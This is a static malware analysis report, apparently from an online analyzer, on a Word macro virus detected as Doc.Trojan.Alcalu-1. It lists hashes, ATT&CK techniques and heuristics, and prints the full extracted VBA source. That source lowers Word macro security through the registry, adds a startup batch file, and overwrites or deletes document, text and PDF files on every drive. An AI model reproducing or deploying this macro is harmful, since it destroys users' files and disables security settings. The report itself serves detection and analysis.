Doc.Trojan.Alcalu-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 b9c0a3ee2f0ee647…

MALICIOUS

Office (OLE)

31.5 KB Created: 2002-01-18 17:37:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 7e78834af1e89eb407b2f63fcfae4178 SHA-1: 4fb7aa50e514a8812bec09c47552193fd5bef579 SHA-256: b9c0a3ee2f0ee6478e17d3a0644c78086717cc72c0cf6fb59c73719ca65504b8
320 Risk Score

Malware Insights

Doc.Trojan.Alcalu-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The VBA macro 'document_open' executes a batch file that writes registry keys to disable macro security and then attempts to copy the document to the startup folder. The script also uses `Shell()` to execute `regedit` and `CreateObject` to copy the document, indicating a persistence mechanism. The ClamAV detection name 'Doc.Trojan.Alcalu-1' further supports the malicious classification.

Heuristics 6

  • ClamAV: Doc.Trojan.Alcalu-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Alcalu-1
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2712 bytes
SHA-256: 2f0b4776c45fa5d903ab906bbb3365036ebc02b70059b093128674485cab93b2
Detection
ClamAV: Doc.Trojan.Alcalu-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "dr_alco"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub document_open()
On Error Resume Next
Dim fso, f
Open "c:\windows\startm~1\programs\startup\winword.bat" For Output As 1
Print #1, "@echo off"
Print #1, "ctty null"
Print #1, ":: MS Word needs this file.. Don't attempt to delete it"
Print #1, "regedit /s c:\windows\winword.reg"
Print #1, "start c:\windows\normal.doc"
Close 1
Open "c:\windows\winword.reg" For Output As 2
Print #2, "REGEDIT4"
Print #2, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
Print #2, """Level""=dword:00000001"
Print #2, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"
Print #2, """Level""=dword:00000001"
Print #2, """AccessVBOM""=dword:00000001"
Close 2
Shell "regedit /s c:\windows\winword.reg", vbHide
Call haha
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(ActiveDocument.FullName)
f.Copy ("c:\windows\normal.doc")
Set b = Assistant.NewBalloon
With b
    .Heading = "Whew!!"
    .Text = "Wassup, doc? You have so many document files in your hard drive.. Better remove some.."
    returnValue = .Show
End With
End Sub
'Technology borrowed from a notorious worm... Retouched and put into good use
Sub haha()
  On Error Resume Next
  Dim d, dc, s, fso, haha
  Set fso = CreateObject("Scripting.FileSystemObject")
  Set dc = fso.Drives
  For Each d In dc
    If d.DriveType = 2 Or d.DriveType = 3 Then
      hihi (d.Path & "\")
    End If
  Next
  haha = s
End Sub
Sub hehe(folderspec)
  On Error Resume Next
  Dim f, f1, fc, ext, s, fso
  Set fso = CreateObject("Scripting.FileSystemObject")
  Set f = fso.GetFolder(folderspec)
  Set fc = f.Files
  For Each f1 In fc
    ext = fso.GetExtensionName(f1.Path)
    ext = LCase(ext)
    s = LCase(f1.Name)
   If (ext = "doc") Then
   Set f = fso.GetFile(ActiveDocument.FullName)
   f.Copy (f1.Path)
   ElseIf (ext = "txt") Or (ext = "wri") Or (ext = "pdf") Then
   Set f = fso.GetFile(ActiveDocument.FullName)
   f.Copy (f1.Path & ".doc")
   fso.DeleteFile (f1.Path)
   End If
Next
End Sub
Sub hihi(folderspec)
  On Error Resume Next
  Dim f, f1, sf, fso
    Set fso = CreateObject("Scripting.FileSystemObject")
  Set f = fso.GetFolder(folderspec)
  Set sf = f.SubFolders
  For Each f1 In sf
    hehe (f1.Path)
    hihi (f1.Path)
  Next
End Sub
'DOC / Doctor by alcopaul
'the 1st, i think (correct me if i'm wrong), stand-alone document virus...
'concept proven

Open this report in the interactive analyzer, or submit your own file for analysis.